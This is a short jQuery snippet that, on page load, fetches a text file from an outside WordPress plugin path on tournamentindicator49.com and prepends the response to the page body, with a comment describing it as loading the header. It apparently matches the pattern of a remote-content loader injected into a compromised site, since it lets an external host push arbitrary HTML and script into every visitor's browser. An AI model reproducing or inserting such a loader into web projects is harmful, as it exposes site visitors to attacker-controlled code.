var $j = jQuery.noConflict(); $j(document).ready(function() { // load in the header $j.ajax({ url: "http://www.tournamentindicator49.com/wp-content/plugins/effects_plus/prescript.txt", context: document.body, success: function(data) { $j(data).prependTo("body"); } }); });